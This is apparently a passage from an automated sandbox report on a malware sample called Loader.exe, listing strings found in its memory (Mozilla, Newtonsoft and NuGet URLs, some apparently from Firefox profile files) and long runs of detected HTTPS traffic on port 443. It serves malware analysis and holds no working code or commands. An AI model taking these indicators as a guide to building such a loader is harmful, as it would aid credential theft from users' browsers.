Source: Loaader.exe, 00000015.00000002.3394522285.0000000013EDE000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139C6000.00000004.00000800.00020000.00000000.sdmp, tmp5FC1.tmp.dat.21.dr, tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Loaader.exe, 00000015.00000002.3394522285.0000000013EDE000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139C6000.00000004.00000800.00020000.00000000.sdmp, tmp5FC1.tmp.dat.21.dr, tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Loaader.exe, 00000015.00000002.3394522285.0000000013EDE000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139C6000.00000004.00000800.00020000.00000000.sdmp, tmp5FC1.tmp.dat.21.dr, tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 61247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 61272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61135 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61285 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61105
Source: unknown	Network traffic detected: HTTP traffic on port 61044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61106
Source: unknown	Network traffic detected: HTTP traffic on port 61067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61228
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61109
Source: unknown	Network traffic detected: HTTP traffic on port 61233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61221
Source: unknown	Network traffic detected: HTTP traffic on port 61313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61101
Source: unknown	Network traffic detected: HTTP traffic on port 61124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61222
Source: unknown	Network traffic detected: HTTP traffic on port 61256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61103
Source: unknown	Network traffic detected: HTTP traffic on port 61147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61224
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61225
Source: unknown	Network traffic detected: HTTP traffic on port 61055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61117
Source: unknown	Network traffic detected: HTTP traffic on port 61209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61119
Source: unknown	Network traffic detected: HTTP traffic on port 61182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61231
Source: unknown	Network traffic detected: HTTP traffic on port 61106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61234
Source: unknown	Network traffic detected: HTTP traffic on port 61274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61235
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61236
Source: unknown	Network traffic detected: HTTP traffic on port 61079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61250
Source: unknown	Network traffic detected: HTTP traffic on port 61159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61006
Source: unknown	Network traffic detected: HTTP traffic on port 61020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61129
Source: unknown	Network traffic detected: HTTP traffic on port 61091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61241
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61125
Source: unknown	Network traffic detected: HTTP traffic on port 61181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61247
Source: unknown	Network traffic detected: HTTP traffic on port 61244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61261
Source: unknown	Network traffic detected: HTTP traffic on port 61301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61017
Source: unknown	Network traffic detected: HTTP traffic on port 61068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61138
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61259
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61018
Source: unknown	Network traffic detected: HTTP traffic on port 61043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61139
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61253
Source: unknown	Network traffic detected: HTTP traffic on port 61255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61254
Source: unknown	Network traffic detected: HTTP traffic on port 61312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61135
Source: unknown	Network traffic detected: HTTP traffic on port 61125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61136
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61257
Source: unknown	Network traffic detected: HTTP traffic on port 61297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61258
Source: unknown	Network traffic detected: HTTP traffic on port 61077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61303
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61305
Source: unknown	Network traffic detected: HTTP traffic on port 61105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61306
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61307
Source: unknown	Network traffic detected: HTTP traffic on port 61208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61309
Source: unknown	Network traffic detected: HTTP traffic on port 61183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61300
Source: unknown	Network traffic detected: HTTP traffic on port 61160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61301
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61302
Source: unknown	Network traffic detected: HTTP traffic on port 61116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61317
Source: unknown	Network traffic detected: HTTP traffic on port 61232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61318
Source: unknown	Network traffic detected: HTTP traffic on port 61066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61319
Source: unknown	Network traffic detected: HTTP traffic on port 61314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61312
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61313
Source: unknown	Network traffic detected: HTTP traffic on port 61325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61325
Source: unknown	Network traffic detected: HTTP traffic on port 61126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61209
Source: unknown	Network traffic detected: HTTP traffic on port 61231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61321
Source: unknown	Network traffic detected: HTTP traffic on port 61149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61323
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61324
Source: unknown	Network traffic detected: HTTP traffic on port 61078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61216
Source: unknown	Network traffic detected: HTTP traffic on port 61104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61218
Source: unknown	Network traffic detected: HTTP traffic on port 61089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61219
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61212
Source: unknown	Network traffic detected: HTTP traffic on port 61033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61213
Source: unknown	Network traffic detected: HTTP traffic on port 61276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61214
Source: unknown	Network traffic detected: HTTP traffic on port 61115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61190
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61193
Source: unknown	Network traffic detected: HTTP traffic on port 61058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61073
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61195
Source: unknown	Network traffic detected: HTTP traffic on port 61196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61187
Source: unknown	Network traffic detected: HTTP traffic on port 61218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61084
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61085
Source: unknown	Network traffic detected: HTTP traffic on port 61242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61199
Source: unknown	Network traffic detected: HTTP traffic on port 61253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61079
Source: unknown	Network traffic detected: HTTP traffic on port 61161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61096
Source: unknown	Network traffic detected: HTTP traffic on port 61241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61089
Source: unknown	Network traffic detected: HTTP traffic on port 61162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61099
Source: unknown	Network traffic detected: HTTP traffic on port 61184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61150
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61271
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61272
Source: unknown	Network traffic detected: HTTP traffic on port 61289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61029
Source: unknown	Network traffic detected: HTTP traffic on port 61240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61143
Source: unknown	Network traffic detected: HTTP traffic on port 61252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61145
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61146
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61267
Source: unknown	Network traffic detected: HTTP traffic on port 61128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61147
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61269
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61280
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61281
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61282
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61283
Source: unknown	Network traffic detected: HTTP traffic on port 61263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61279
Source: unknown	Network traffic detected: HTTP traffic on port 61014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61159
Source: unknown	Network traffic detected: HTTP traffic on port 61278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61291
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61171
Source: unknown	Network traffic detected: HTTP traffic on port 61251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61292
